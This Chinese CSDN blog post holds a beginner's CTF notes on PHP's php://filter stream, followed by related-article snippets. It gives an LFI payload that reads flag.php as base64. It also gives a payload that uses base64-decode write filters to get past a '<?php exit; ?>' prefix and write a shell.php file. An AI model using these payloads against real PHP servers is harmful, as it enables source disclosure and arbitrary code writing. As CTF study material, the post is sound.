理解php://filter用处

最新推荐文章于 2023-08-16 19:14:17 发布
最新推荐文章于 2023-08-16 19:14:17 发布
阅读量235 收藏 1
点赞数
文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lixin_1010/article/details/131444780
版权
php://filter是一个用于读取和写入文件的流协议,它可以用于对文件内容进行过滤和转换,例如使用convert.base64-encode来编码文件内容。在Web安全场景下,此功能可能被利用来绕过某些限制,如在代码注入中避开exit语句的影响。通过字符串拼接和base64解码,可以实现代码的写入和执行。
摘要由CSDN通过智能技术生成

理解php://filter


开始做一些简单的web题目,遇到的第一个题目[ACTF2020 新生赛]Include
1就是php://filter,结果没有做出来上网查了wp发现是这样一道题目就上网查了一下原理简单理解如下:

php文件内部分内容类似于注释等内容无法在界面中展示出来,使用php://filter可以实现文件的取,另外如果直接读取文件也同样无法读取全部内容,因此使用base64加密的方式将全部内容输出出来

具体命令如下:
file=php://filter/read=convert.base64-encode/resource=flag.php
内容输出后为base64编码,通过编码转换即可得到结果

深入学习filter这个协议后发现还有更深入的用法类似

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);

.=为字符串拼接使用,在’<?php exit; ?>'后所有代码均不执行,因为提前有了个exit的动作。可以通过上传代码绕过该命令。使用file=php://filter/write=convert.base64-decode/resource=flag.php
txt=aPD9waHAgcGhwaW5mbygpOyA/Pg==;filename=php://filter/wirte=convert.base64-decode/resource=shell.php

lierpang_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php filter base64,通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
weixin_32446485的博客
03-11 1476
PHP LFI读php文件源码以及直接post webshell2013-08-17 15:25:15|分类: 安全 |字号订阅最近在忙defcon的题目集训其中有一套题目里有个老外写的writeup中提到了LFI的另一种小技巧原文请参考http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/PS:该...
php://filter利用条件,浅谈php://filter技巧
weixin_33744799的博客
03-28 1155
php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。巧用编码与解码$content ...
php filter base64,php://filter的妙用
weixin_36377516的博客
03-11 810
php://filterPHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出以下是2018年moctf一道 死亡退出的题查看源码:写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里!先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 f...
PHP之Base64+php://filter绕过、disabled_function绕过
求大佬师傅带
08-16 841
PHP之Base64+php://filter绕过、disabled_function绕过
php 读取目录
weixin_42136237的博客
10-05 1093
php 读取目录
CTF知识总结,写的不错
最新发布
10-29
- **全局变量与`globals()`**:如何操作全局变量,以及`globals()`函数的用途。 - **`json.loads`**:JSON数据的序列化与反序列化操作。 - **Flask框架**:包括内存马和静态文件夹配置。 - **`pickle`模块**:...
FirstYii:第一PHP Yii
04-27
3. **配置文件**:理解`main.php`和`config.php`等配置文件的用途,如何配置数据库连接。 4. **数据库操作**:通过Gii工具生成模型和迁移,学习如何执行SQL文件来构建数据库。 5. **路由和URL管理**:理解Yii的URL...
PHP实例开发源码-人事管理系统 php版.zip
11-22
本实例开发的人事管理系统是基于PHP技术实现的,旨在帮助开发理解PHP在实际项目中的应用,以及如何构建一个功能完备的人事管理平台。下面我们将深入探讨该系统的架构设计、主要功能模块以及代码实现的关键点。 ...
php-mp4info_jyvbce_php_
10-03
2. f6939746b1dabfeb791274ae1e43c30f.txt、e506313eae7cc7a901dd8c552a0e4746.txt、448198b5a5e610dab75db251543d066f.txt - 这些看似随机命名的文件可能是日志文件、临时文件或加密/哈希过的数据,具体用途需要...
基于PHP的Oreo易支付开源版.zip
07-22
1. **PHP基础**:理解PHP的基本语法、变量、数据类型、控制结构、函数和类,是使用PHP开发支付系统的前提。熟悉面向对象编程(OOP)的概念,如继承、封装和多态性,也是必要的。 2. **支付网关集成**:Oreo易支付...
php://filter 的使用
热门推荐
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
php://filter(文件包含漏洞利用)及php://input(转载)
知足且坚定,温柔且上进
02-08 1244
php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: ·string.rot13 对字符串执行ROT13转换 ·string.toupper转换为大写 ·string.tolower 转换为小写 ·string.strip_tags去除html和p...
php://filter协议在任意文件读取漏洞中的利用二(学习总结)
L2329794714的博客
11-12 1040
一、练习题目源码 练习题目描述: 练习任务:为获取web目录下的flag信息。 index.php 接受GET 输入str,并保存在test/test.php中,但用户输入的字符前会自动添加 exit() 退出函数,使得test.php 没机会执行用户输入的shell就退出。flag信息隐藏在flag.php中,但直接访问falg.php,被不会得到flag。 #index.php 文件 <? <?php $str="<?php ...
[PHP底层]关于php://filter的分析
Y4tacker的博客
11-08 1953
文章目录写在前面关于php://filter的处理的一些简单解释php://filter常规流程分析关于exp的分析题外话 写在前面 慢慢不太想写博客了,很多东西都忙不过来,学的很多,今天抽出空来还是督促自己写一篇,灵感来源于刚刚在网上看到的一篇wp,https://xz.aliyun.com/t/10446,不得不说现在比赛可真多哈,小伙伴们也别太经常打,多做点实际的东西 关于php://filter的处理的一些简单解释 这里面呢,有几个比较关键的,一个是需要能获取到文件流(也就是我们后面常常写的reso
php://filter协议在任意文件读取漏洞中的利用(学习总结)
L2329794714的博客
11-12 3264
一、php://协议 官网解释为: php://—AccessingvariousI/O streams PHP provides a number of miscellaneous I/O streams that allow access to PHP's own input and output streams, the standard input, output and error file descriptors, in-memory and disk-backe...
phpfilter的妙用
weixin_44576725的博客
04-14 4597
php://filter的妙用 php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”。 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file()和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。
Actf2020 Include[关于php://filter协议读取文件的wriptup]
sGanYu
09-16 1452
[ACTF2020 新生赛]Include 在点击tips后,提示需要从中找出flag 这里需要用到php://filter协议读内容 php://filter/read=convert.base64-encode/resource=index.php php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,也可以进行任意文件的读取,具有resource(要过滤的数据流)、read(读链筛选的数据流)、write(写链筛选的数据流)等等参数。​ 在知道使.
php://filter
2202_75317918的博客
04-12 3035
php://filter
php://filter/
小龙在线
09-07 722
php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字filter可以很容易想到这个协议可以用来过滤一些东西。
PHP伪协议详解:file:///与php://功能与安全设置
- **条件**:PHP配置中的`allow_url_fopen` 和 `allow_url_include` 选项影响其使用。默认情况下,`allow_url_fopen` 为 `on`,允许访问文件系统,而 `allow_url_include` 为 `off`,禁止包含外部文件。但在某些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值